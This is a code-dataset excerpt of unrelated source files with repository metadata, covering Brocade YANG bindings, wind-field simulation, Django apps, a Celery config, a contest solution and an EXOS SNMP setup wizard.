self.__address = YANGDynClass(base=[RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(/(([0-9])|([0-9]{2})|(1[0-1][0-9])|(12[0-8])))'}),RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(/(([0-9])|([0-9]{2})|(1[0-1][0-9])|(12[0-8])))'}),], is_leaf=True, yang_name="address", rest_name="address", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'A:B::C:D/LEN;; IPv6 prefix format: xxxx:xxxx/ml, xxxx:xxxx::/ml, xxxx::xx/128'}}, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-ipv6-config', defining_module='brocade-ipv6-config', yang_type='union', is_config=True)
def _get_eui64(self):
"""
Getter method for eui64, mapped from YANG variable /routing_system/interface/loopback/ipv6/ipv6_config/address/ipv6_address/eui64 (empty)
"""
return self.__eui64
def _set_eui64(self, v, load=False):
"""
Setter method for eui64, mapped from YANG variable /routing_system/interface/loopback/ipv6/ipv6_config/address/ipv6_address/eui64 (empty)
If this variable is read-only (config: false) in the
source YANG file, then _set_eui64 is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_eui64() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="eui64", rest_name="eui-64", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Configure ipv6 address with an automatically computed EUI-64 interface Id', u'alt-name': u'eui-64'}}, namespace='urn:brocade.com:mgmt:brocade-ipv6-config', defining_module='brocade-ipv6-config', yang_type='empty', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """eui64 must be of a type compatible with empty""",
'defined-type': "empty",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="eui64", rest_name="eui-64", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Configure ipv6 address with an automatically computed EUI-64 interface Id', u'alt-name': u'eui-64'}}, namespace='urn:brocade.com:mgmt:brocade-ipv6-config', defining_module='brocade-ipv6-config', yang_type='empty', is_config=True)""",
})
self.__eui64 = t
if hasattr(self, '_set'):
self._set()
def _unset_eui64(self):
self.__eui64 = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="eui64", rest_name="eui-64", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Configure ipv6 address with an automatically computed EUI-64 interface Id', u'alt-name': u'eui-64'}}, namespace='urn:brocade.com:mgmt:brocade-ipv6-config', defining_module='brocade-ipv6-config', yang_type='empty', is_config=True)
def _get_anycast(self):
"""
Getter method for anycast, mapped from YANG variable /routing_system/interface/loopback/ipv6/ipv6_config/address/ipv6_address/anycast (empty)
"""
return self.__anycast
def _set_anycast(self, v, load=False):
"""
Setter method for anycast, mapped from YANG variable /routing_system/interface/loopback/ipv6/ipv6_config/address/ipv6_address/anycast (empty)
If this variable is read-only (config: false) in the
source YANG file, then _set_anycast is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_anycast() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="anycast", rest_name="anycast", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Configure ipv6 address as anycast'}}, namespace='urn:brocade.com:mgmt:brocade-ipv6-config', defining_module='brocade-ipv6-config', yang_type='empty', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """anycast must be of a type compatible with empty""",
'defined-type': "empty",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="anycast", rest_name="anycast", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Configure ipv6 address as anycast'}}, namespace='urn:brocade.com:mgmt:brocade-ipv6-config', defining_module='brocade-ipv6-config', yang_type='empty', is_config=True)""",
})
self.__anycast = t
if hasattr(self, '_set'):
self._set()
def _unset_anycast(self):
self.__anycast = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="anycast", rest_name="anycast", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Configure ipv6 address as anycast'}}, namespace='urn:brocade.com:mgmt:brocade-ipv6-config', defining_module='brocade-ipv6-config', yang_type='empty', is_config=True)
address = __builtin__.property(_get_address, _set_address)
eui64 = __builtin__.property(_get_eui64, _set_eui64)
anycast = __builtin__.property(_get_anycast, _set_anycast)
_pyangbind_elements = {'address': address, 'eui64': eui64, 'anycast': anycast, }
|
[
"badaniya@brocade.com"
] |
badaniya@brocade.com
|
fbc9661d70e561d78342cfa587b4a738aa00e9e6
|
c85ec43e50f81f8e20c883eae9e06a5c8c621f8e
|
/caldera/utils/__init__.py
|
b2967128d628a732cece629c50a123db23a166f8
|
[
"MIT"
] |
permissive
|
jvrana/caldera
|
b6cc0faed560df6bfa15a3f460fed4ea18b8a55a
|
a346324e77f20739e00a82f97530dda4906f59dd
|
refs/heads/master
| 2023-04-27T04:19:05.499430
| 2021-03-09T16:37:50
| 2021-03-09T16:37:50
| 266,161,720
| 0
| 0
|
MIT
| 2020-08-12T01:40:48
| 2020-05-22T16:49:35
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 1,795
|
py
|
r"""
Caldera utility functions.
.. autosummary::
:toctree: generated/
dict_join
# pairwise
Indexing
--------
.. autosummary::
:toctree: generated/
reindex_tensor
unravel_index
Tensor
------
Utilities for :class:`torch.Tensor`
.. autosummary::
:toctree: generated/
scatter_coo
scatter_indices
torch_coo_to_scipy_coo
deterministic_seed
long_isin
same_storage
stable_arg_sort_long
tensor_is_empty
torch_scatter_group
Functional
----------
Functional programming module.
.. autosummary::
:toctree: generated/
:recursive:
functional
Networkx Utilities
------------------
Extra :mod:`networkx` utilities
.. autosummary::
:toctree: generated/
:recursive:
"""
from ._dict_join import dict_join
from ._iteration import _first
from ._iteration import pairwise
from caldera.utils.indexing import reindex_tensor
from caldera.utils.indexing import unravel_index
from caldera.utils.np import replace_nan_with_inf
from caldera.utils.sparse import scatter_coo
from caldera.utils.sparse import scatter_indices
from caldera.utils.sparse import torch_coo_to_scipy_coo
from caldera.utils.tensor import deterministic_seed
from caldera.utils.tensor import long_isin
from caldera.utils.tensor import same_storage
from caldera.utils.tensor import stable_arg_sort_long
from caldera.utils.tensor import tensor_is_empty
from caldera.utils.tensor import torch_scatter_group
__all__ = [
"reindex_tensor",
"unravel_index",
"scatter_coo",
"scatter_indices",
"torch_coo_to_scipy_coo",
"deterministic_seed",
"long_isin",
"same_storage",
"stable_arg_sort_long",
"tensor_is_empty",
"torch_scatter_group",
"dict_join",
"pairwise",
"_first",
"replace_nan_with_inf",
]
|
[
"justin.vrana@gmail.com"
] |
justin.vrana@gmail.com
|
7b45ab15120fc12e379631a88aafbb6bba143f47
|
23ef5cb5eed3b2768c8e26208eeb0b8922c743bf
|
/dossier/models/__init__.py
|
9492dae9aeb53ab1a4aefe837408c830de986c5d
|
[
"MIT"
] |
permissive
|
anukat2015/dossier.models
|
3c66396dd09e6f5a618b199d674340e23769c342
|
c9e282f690eab72963926329efe1600709e48b13
|
refs/heads/master
| 2021-01-21T10:45:33.881681
| 2015-10-08T18:38:35
| 2015-10-08T18:38:35
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 706
|
py
|
'''
.. This software is released under an MIT/X11 open source license.
Copyright 2012-2014 Diffeo, Inc.
``dossier.models`` provides search engines and a :mod:`dossier.web`
application for working with active learning.
.. automodule:: dossier.models.web.run
.. automodule:: dossier.models.pairwise
.. automodule:: dossier.models.features
.. automodule:: dossier.models.etl
.. automodule:: dossier.models.dragnet
.. automodule:: dossier.models.soft_selectors
.. automodule:: dossier.models.linker
'''
from dossier.models import features
from dossier.models.pairwise import PairwiseFeatureLearner, similar, dissimilar
__all__ = [
'PairwiseFeatureLearner', 'similar', 'dissimilar',
'features',
]
|
[
"andrew@diffeo.com"
] |
andrew@diffeo.com
|
b82d9de712eba7a44376cc047eef206300213664
|
87ba02d5ebf91cbc0fadd50ca44196177b3c86b7
|
/modules/performRegionalEventSimulation/regionalWindField/ComputeIntensityMeasure.py
|
bfd018d5c1b3bef55b8a59205c29082604f7389b
|
[] |
no_license
|
joannajzou/SimCenterBackendApplications
|
4cd6ff9ec856ab634bbf97ff4e67a336cacfba5b
|
5f040fcbe0b7a2080918ce3f7f07ca6e2ae51b16
|
refs/heads/master
| 2021-06-23T18:19:04.498654
| 2021-03-17T13:41:08
| 2021-03-17T13:41:08
| 202,189,745
| 0
| 0
| null | 2021-03-17T13:41:09
| 2019-08-13T17:07:43
|
Python
|
UTF-8
|
Python
| false
| false
| 15,936
|
py
|
# -*- coding: utf-8 -*-
#
# Copyright (c) 2018 Leland Stanford Junior University
# Copyright (c) 2018 The Regents of the University of California
#
# This file is part of the SimCenter Backend Applications
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# You should have received a copy of the BSD 3-Clause License along with
# this file. If not, see <http://www.opensource.org/licenses/>.
#
# Contributors:
# Kuanshi Zhong
#
import os
import subprocess
import sys
import json
import copy
import shutil
import multiprocessing as mp
import numpy as np
import pandas as pd
from WindFieldSimulation import *
def run_model(scen, p, t, path_perturb, feat_perturb, res_mp):
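    # One Monte Carlo realization: build the analytical cyclone model, apply
    # terrain/mesh/track/station settings, randomly perturb the storm path and
    # features, then append the simulated station wind data to the shared list.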
model = LinearAnalyticalModel_SnaikiWu_2017(cyclone_param = p, storm_track = t)
if scen['Terrain']:
model.add_reference_terrain(scen['Terrain'])
model.set_cyclone_mesh(scen['StormMesh'])
model.set_measure_height(scen['MeasureHeight'])
model.define_track(scen['TrackSimu'])
model.add_stations(scen['StationList'])
delta_path = (np.random.rand(3) - 0.5) * path_perturb
delta_feat = np.array(p[3:6]) + (np.random.rand(3) - 0.5) * feat_perturb
    # This is just an engineering judgement: the pressure difference, moving
    # speed, and max-wind-speed radius should not be less than 0.0.
    delta_feat[delta_feat < 0.0] = 0.0
    print('dLatitude, dLongitude, dAngle = ', delta_path)
print('dP, v, Rmax = ', delta_feat)
model.set_delta_path(delta_path)
model.set_delta_feat(delta_feat)
model.compute_wind_field()
res_mp.append(model.get_station_data())
def simulate_storm(scenarios, event_info, model_type):
if (model_type == 'LinearAnalytical'):
num_per_site = event_info['NumberPerSite']
if (num_per_site == 1):
path_perturb = np.zeros(3)
feat_perturb = np.zeros(3)
else:
if (len(event_info.get('Perturbation', [])) != 6):
print('ComputeIntensityMeasure: Perturbation should have a size of 6.')
path_perturb = np.array([0.5, 0.5, 90.0])
feat_perturb = np.array([10.0, 10.0, 10.0])
                print('ComputeIntensityMeasure: [0.5, 0.5, 90.0, 10.0, 10.0, 10.0] is used for perturbations.')
else:
path_perturb = np.array(event_info['Perturbation'][0:3])
feat_perturb = np.array(event_info['Perturbation'][3:6])
for i in range(len(scenarios)):
if (i == 1):
print('ComputeIntensityMeasure: currently supporting single scenario simulation only.')
return -1
cur_scen = scenarios[i]
param = cur_scen['CycloneParam']
track = cur_scen['StormTrack']
np.random.seed(100)
# parallel
with mp.Manager() as manager:
res_mp = manager.list([])
proc_list = []
for k in range(num_per_site):
proc = mp.Process(target = run_model,
args = (cur_scen, param, track, path_perturb, feat_perturb, res_mp))
proc_list.append(proc)
for k in range(num_per_site):
proc = proc_list[k]
proc.start()
for k in range(num_per_site):
proc = proc_list[k]
proc.join()
# extract data
res = [x for x in res_mp]
    else:
        print('ComputeIntensityMeasure: currently only supporting LinearAnalytical model')
        return -1
# return
return res
def simulate_storm_cpp(site_info, scenario_info, event_info, model_type, dir_info):
if (model_type == 'LinearAnalytical'):
# save configuration file
input_dir = dir_info['Input']
output_dir = dir_info['Output']
config = {
"Scenario": scenario_info,
"Event": event_info
}
abs_path_config = os.path.abspath(os.path.join(input_dir, 'SimuConfig.json'))
with open (abs_path_config, "w") as f:
json.dump(config, f)
# site file
abs_path_site = os.path.abspath(os.path.join(input_dir, site_info['input_file']))
# track file
abs_path_track = os.path.abspath(os.path.join(input_dir, scenario_info['Storm']['Track']))
# lat_w file
abs_path_latw = os.path.abspath(os.path.join(input_dir, scenario_info['Storm']['TrackSimu']))
# terrain file
if ('Terrain' in scenario_info.keys()):
abs_path_terrain = os.path.abspath(os.path.join(input_dir, scenario_info['Terrain']))
else:
# default terrain z0 = 0.01 everywhere for the defined domain
abs_path_terrain = os.path.abspath(os.path.join(input_dir, 'DefaultTerrain.geojson'))
dict_dt = {
"type": "FeatureCollection",
"features": [{
"type": "Feature",
"geometry": {
"type": "Polygon",
"coordinates": [
[-90.0, -180.0],
[90.0, -180.0],
[90.0, 180.0],
[-90.0, 180.0]]
},
"properties": {
"z0": 0.01
}
}
]
}
with open(abs_path_terrain, 'w') as f:
json.dump(dict_dt, f, indent=2)
# configuring perturbation
num_per_site = event_info['NumberPerSite']
if (num_per_site == 1):
path_perturb = np.zeros(3)
feat_perturb = np.zeros(3)
else:
if (len(event_info.get('Perturbation', [])) != 6):
print('ComputeIntensityMeasure: Perturbation should have a size of 6.')
path_perturb = np.array([0.5, 0.5, 90.0])
feat_perturb = np.array([10.0, 10.0, 10.0])
                print('ComputeIntensityMeasure: [0.5, 0.5, 90.0, 10.0, 10.0, 10.0] is used for perturbations.')
else:
path_perturb = np.array(event_info['Perturbation'][0:3])
feat_perturb = np.array(event_info['Perturbation'][3:6])
for i in range(int(scenario_info['Number'])):
if (i == 1):
print('ComputeIntensityMeasure: currently supporting single scenario simulation only.')
return -1
np.random.seed(100)
res = []
# parallel
pert_list = []
args_list = []
odir_list = []
if sys.platform.startswith('win'):
windsimu_bin = os.path.dirname(__file__) + '/WindFieldSimulation.exe'
else:
windsimu_bin = os.path.dirname(__file__) + '/WindFieldSimulation'
## preparing files
for j in range(num_per_site):
delta_path = (np.random.rand(3) - 0.5) * path_perturb
delta_feat = (np.random.rand(3) - 0.5) * feat_perturb
pert_dict = {
"dLatitude": delta_path[0],
"dLongitude": delta_path[1],
"dAngle": delta_path[2],
"dP": delta_feat[0],
"dV": delta_feat[1],
"dR": delta_feat[2]
}
abs_path_pert = os.path.abspath(os.path.join(input_dir, 'Perturbation' + str(j) + '.json'))
with open(abs_path_pert, "w") as f:
json.dump(pert_dict, f)
            print('dLatitude, dLongitude, dAngle = ', delta_path)
print('dP, dv, dR = ', delta_feat)
output_subdir = os.path.abspath(os.path.join(output_dir, 'simu' + str(j)))
if os.path.exists(output_subdir):
shutil.rmtree(output_subdir)
os.makedirs(output_subdir)
args = [windsimu_bin, "--config", abs_path_config, "--site", abs_path_site,
"--track", abs_path_track, "--latw", abs_path_latw, "--pert", abs_path_pert,
"--terrain", abs_path_terrain, "--z0", output_subdir,
"--output", output_subdir]
pert_list.append(abs_path_pert)
args_list.append(args)
odir_list.append(output_subdir)
## running
procs_list = [subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE) for cmd in args_list]
for proc in procs_list:
proc.wait()
## loading output
for j in range(num_per_site):
os.remove(pert_list[j])
station_res = {
'Latitude': [],
'Longitude': [],
'z0': [],
'PWS': {
'height': [],
'duration': 600.0,
'windspeed': []
}
}
df = pd.read_csv(os.path.join(os.path.abspath(odir_list[j]), 'StationZ0.csv'), header = None, index_col = None)
station_res['z0'] = list(np.concatenate(df.values.tolist()).flat)
df = pd.read_csv(os.path.join(os.path.abspath(odir_list[j]), 'MeasureHeight.csv'), header = None, index_col = None)
station_res['PWS']['height'] = df.values.tolist()[0]
df = pd.read_csv(os.path.join(os.path.abspath(odir_list[j]), 'MaxWindSpeed.csv'), header = None, index_col = None)
station_res['PWS']['windspeed'] = df.values.tolist()
res.append(station_res)
shutil.rmtree(odir_list[j])
# house-keeping
os.remove(abs_path_config)
    else:
        print('ComputeIntensityMeasure: currently only supporting LinearAnalytical model')
        return -1
# return
return res
def convert_wind_speed(event_info, simu_res):
    print('ComputeIntensityMeasure: converting peak wind speed to specified exposure, measuring height, and gust duration.')
if ('HAZUS' in event_info['IntensityMeasure']['Type']):
# Exposure type C: z0 = 0.03
exposure = 'C'
# 10-m measuring height
reference_height = 10.0
# 3-s gust duration
gust_duration = 3.0
else:
exposure = event_info['IntensityMeasure']['Exposure']
if exposure not in ['A', 'B', 'C', 'D']:
print('ComputeIntensityMeasure: the Exposure should be A, B, C, or D.')
return -1
gust_duration = event_info['IntensityMeasure']['GustDuration']
reference_height = event_info['IntensityMeasure']['ReferenceHeight']
pws_mr = []
for i in range(len(simu_res)):
cur_res = simu_res[i]
# Reading simulation heights
measure_height = cur_res['PWS']['height']
# Reading simulated wind speed
pws_raw = np.array(cur_res['PWS']['windspeed'])
# Reading z0 in the simulation
z0_simu = np.array(cur_res['z0'])
# Reading gust duration in the simulation
gust_duration_simu = cur_res['PWS']['duration']
# quick check the size
if pws_raw.shape[1] != len(measure_height):
print('ComputeIntensityMeasure: please check the output wind speed results.')
return -1
# ASCE 7-16 conversion (Chapter C26)
# station-wise empirical exponent \alpha
alpha = 5.65 * (z0_simu ** (-0.133))
# station-wise gradient height
zg = 450.0 * (z0_simu ** 0.125)
        # target exposure alpha and gradient height
if (exposure == 'B'):
alpha_t = 7.0
zg_t = 365.76
elif (exposure == 'D'):
alpha_t = 11.5
zg_t = 213.36
else:
# 'C'
alpha_t = 9.5
zg_t = 274.32
# conversion
pws_raw = interp_wind_by_height(pws_raw, measure_height, reference_height)
print(np.max(pws_raw))
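        # two-step power-law conversion implemented below:
        #   V_g = V(z_ref) * (zg / z_ref) ** (1 / alpha)         (up to gradient height)
        #   V_t(z_ref) = V_g * (z_ref / zg_t) ** (1 / alpha_t)   (down under target exposure)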
# computing gradient-height wind speed
pws_tmp = pws_raw * (zg / reference_height) ** (1.0 / alpha)
# converting exposure
pws_tmp = pws_tmp * (reference_height / zg_t) ** (1.0 / alpha_t)
pws = pws_tmp * gust_factor_ESDU(gust_duration_simu, gust_duration)
print(np.max(pws))
# appending to pws_mr
pws_mr.append(pws)
print('ComputeIntensityMeasure: wind speed conversion completed.')
# return
return pws_mr
def interp_wind_by_height(pws_ip, height_simu, height_ref):
"""
    interp_wind_by_height: interpolate the simulated wind speeds to the reference height
"""
num_stat = pws_ip.shape[0]
pws_op = np.zeros(num_stat)
for i in range(num_stat):
pws_op[i] = np.interp(height_ref, height_simu, pws_ip[i, :], left = pws_ip[i, 0], right = pws_ip[i, -1])
# return
return pws_op
def gust_factor_ESDU(gd_c, gd_t):
"""
    gust_factor_ESDU: return the gust factor ratio between gust durations gd_c and gd_t
"""
# gust duration (sec)
gd = [1.0, 2.0, 5.0, 10.0, 20.0,
50.0, 100.0, 200.0, 500.0, 1000.0,
2000.0, 3600.0]
# gust factor w.r.t. 3600 sec
gf = [1.59, 1.55, 1.47, 1.40, 1.32,
1.20, 1.15, 1.10, 1.055, 1.045,
1.02, 1.00]
# interpolation
gf_t = np.interp(gd_t, gd, gf, left = gf[0], right = gf[-1]) \
/ np.interp(gd_c, gd, gf, left = gf[0], right = gf[-1])
# return
return gf_t
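# Illustrative check using the table above: gust_factor_ESDU(600.0, 3.0)
# interpolates gf(3 s) ~= 1.52 and gf(600 s) ~= 1.05, so the returned factor
# is ~1.45, i.e. the 3-s gust is about 45% higher than the 10-min mean wind.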
def export_pws(stations, pws, output_dir, filename = 'EventGrid.csv'):
print('ComputeIntensityMeasure: saving results.')
# collecting site locations
lat = []
lon = []
for s in stations['Stations']:
lat.append(s['Latitude'])
lon.append(s['Longitude'])
# saving data
station_num = len(lat)
csv_file = [str(x + 1)+'.csv' for x in range(station_num)]
d = {
'Station': csv_file,
'Latitude': lat,
'Longitude': lon
}
df = pd.DataFrame.from_dict(d)
df.to_csv(os.path.join(output_dir, filename), index = False)
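    # one CSV per station follows: each row is the peak wind speed from one
    # perturbation realization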
for i in range(station_num):
        pws_op = [p[i] for p in pws]
d = {
'PWS': pws_op
}
df = pd.DataFrame.from_dict(d)
df.to_csv(os.path.join(output_dir, csv_file[i]), index = False)
print('ComputeIntensityMeasure: simulated wind speed field saved.')
|
[
"kuanshi@stanford.edu"
] |
kuanshi@stanford.edu
|
a99f13ede01d669f9d08ea0b81d5060a90e06750
|
686a962bc2c9527e0fb63f6f9bc659fcf3568bf6
|
/rest/models.py
|
9458344863e529089463a4c8c0509725b08f3559
|
[] |
no_license
|
mourasis/webservice
|
572c62608e53846f0160aae567da1595631202b1
|
3a7d67239a30e753bf89d09394f96442ccbfd1ad
|
refs/heads/master
| 2020-06-23T03:57:20.300943
| 2019-07-23T20:52:48
| 2019-07-23T20:52:48
| 198,503,495
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 236
|
py
|
from django.db import models
class Livro(models.Model):
titulo = models.CharField(max_length=200)
autor = models.CharField(max_length=200)
volume = models.IntegerField()
def __str__(self):
return self.titulo
|
[
"root@moura.local"
] |
root@moura.local
|
c564381b8a3786274c292ddc6a57ed24ad1e6895
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03681/s311284212.py
|
d8b25fb6e7dd6d5384882806daa8e1c440d5c178
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 298
|
py
|
n, m = map(int, input().split())
mod = 10 ** 9 + 7
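# Alternating arrangement of two groups of distinct items (sizes n and m):
# impossible if the sizes differ by 2 or more, n! * m! if they differ by 1,
# and 2 * n! * m! if equal (either group may start the row).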
if abs(n - m) >= 2:
print(0)
else:
res = 1
for i in range(1, n+1):
res = res * i % mod
for i in range(1, m+1):
res = res * i % mod
if abs(n - m) == 1:
print(res)
else:
print(res * 2 % mod)
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
237eac4b7ec61fc9f01809d041c1a345f7a690ea
|
47cb331a4ad7eee2a352e65ea197f3d0dbce7bb4
|
/configuratie_visualisatie_firewalls_webapp/run.py
|
4f40948d8f8c12e01cc00a3ce7074deff728b884
|
[] |
no_license
|
Bakkerino/firewall_configuration_tool
|
d0694d5c9e44d7819b0f449c6ecb34bd34083395
|
0ea5326b36b4dca430f6fc00e68015e2a43855ba
|
refs/heads/master
| 2022-12-04T06:33:38.107245
| 2020-08-20T10:07:25
| 2020-08-20T10:07:25
| 261,829,028
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 86
|
py
|
from cvf import app
if __name__ == "__main__":
app.run(debug=app.config["DEBUG"])
|
[
"k.m.bakker@st.hanze.nl"
] |
k.m.bakker@st.hanze.nl
|
0ad8cf2793f9f48f35cd1dc144cabb7c55a3dbd8
|
28e06d5e6e31940d85777b5081aa8d1a7e61adc9
|
/Parking_Lot/Parking_Lot/celery.py
|
36a648b702d13ee62f3661dc71234819754ca882
|
[] |
no_license
|
saurav004/ParkingLot
|
24316a82ccb710e0145f86483c247e200d30bfbb
|
72ceb109f20060c7a8af15cb407e09db8598c858
|
refs/heads/master
| 2023-02-13T09:38:52.834470
| 2021-01-09T07:36:19
| 2021-01-09T07:36:19
| 323,919,157
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 719
|
py
|
from __future__ import absolute_import, unicode_literals
import os
from celery import Celery
# set the default Django settings module for the 'celery' program.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'Parking_Lot.settings')
app = Celery('Parking_Lot')
# Using a string here means the worker doesn't have to serialize
# the configuration object to child processes.
# - namespace='CELERY' means all celery-related configuration keys
# should have a `CELERY_` prefix.
app.config_from_object('django.conf:settings', namespace='CELERY')
# Load task modules from all registered Django app configs.
app.autodiscover_tasks()
@app.task(bind=True)
def debug_task(self):
print(f'Request: {self.request!r}')
|
[
"logtosaurav@gmail.com"
] |
logtosaurav@gmail.com
|
dd0c5db76215bf755e43da64fa6e3ece88b1a20a
|
d17f6409d93f1ee84e14fe962ecc2782464ca551
|
/rango/admin.py
|
86ff6ace6614c0790724e50e2bf735ce76ecbe50
|
[] |
no_license
|
lewisponsonby/tango_with_django_project
|
4e55864954bc31f5dda5240ba8234e645781a08e
|
77ca3d91a8eb5bf1843b414e09210b02d369431a
|
refs/heads/main
| 2023-03-04T23:41:41.208674
| 2021-02-11T00:27:31
| 2021-02-11T00:27:31
| 329,949,922
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 391
|
py
|
from django.contrib import admin
from rango.models import Category, Page
from rango.models import UserProfile
class PageAdmin(admin.ModelAdmin):
list_display=("title","category","url")
class CategoryAdmin(admin.ModelAdmin):
prepopulated_fields = {"slug":("name",)}
admin.site.register(Category, CategoryAdmin)
admin.site.register(Page, PageAdmin)
admin.site.register(UserProfile)
|
[
"2464980P@student.gla.ac.uk"
] |
2464980P@student.gla.ac.uk
|
0a5af99dfde92508bd7713c364ddabefec4bc691
|
4bd4bec81c5dcf634b21902204b1d1da4fc49dc9
|
/Python/EXOS/snmpv1v2configpy/SNMPv1v2Config.py
|
960fead3dcdb9aecffeb1963c0862da24af1041e
|
[
"BSD-2-Clause"
] |
permissive
|
mhelmEXTR/ExtremeScripting
|
d7b2b095151bbd670f67140c01a6004b78e8388f
|
fd8554748dfb4b408965d9a3e1a977c6a86842e2
|
refs/heads/master
| 2021-07-07T17:27:07.330072
| 2021-04-29T16:43:32
| 2021-04-29T16:43:32
| 45,707,060
| 0
| 0
| null | 2015-11-06T20:55:50
| 2015-11-06T20:55:49
| null |
UTF-8
|
Python
| false
| false
| 3,293
|
py
|
#!/usr/bin/env python
'''
Wizard to configure SNMP
'''
import re
import exsh  # EXOS on-switch CLI module; both imports are used below
#############################################################################
# SNMP v1/v2 Variable definitions
#############################################################################
#clierrormode = raw_input("If this script encounters errors, do you wish to abort or ignore?: ")
ynsnmpconfig = raw_input("Configure SNMP v1/v2 access? (yes or no): ")
ynsnmpdisable = raw_input("Disable SNMP v1/v2 access? (yes or no): ")
ynsnmpcommadd = raw_input("Add SNMP v1/v2 communities? (yes or no): ")
snmprwname = raw_input("Read/Write SNMP Community Name?: ")
snmproname = raw_input("Read-Only SNMP Community Name?: ")
ynsnmpcommrem = raw_input("Remove default SNMP Communities? (yes or no): ")
snmpname = raw_input("SNMP Switch Name?: ")
snmplocation = raw_input("SNMP Location?: ")
snmpcontact = raw_input("SNMP Contact?: ")
snmptrapcount = int(raw_input("Number of SNMP Trap Receivers (Script supports: 1-3): "))  # int, so the numeric checks below work
snmptrap1 = raw_input("SNMP Trap Receiver #1: ")
snmptrap2 = raw_input("SNMP Trap Receiver #2: ")
snmptrap3 = raw_input("SNMP Trap Receiver #3: ")
#############################################################################
# SNMP V1/V2 Configuration
#############################################################################
#if (re.match(clierrormode,"ignore")):
# configure cli mode scripting ignore-error
# create log entry "CLI mode set for Ignore on Error"
#else
# configure cli mode scripting abort-on-error
# create log entry "CLI mode set for Abort on Error"
if (re.match("yes", ynsnmpconfig)):  # re.match(pattern, string): the literal "yes" is the pattern
exsh.clicmd("create log entry \"Starting SNMP Configuration\"", True)
print("Starting SNMP Configuration")
exsh.clicmd("configure snmp sysName %s" % snmpname, True)
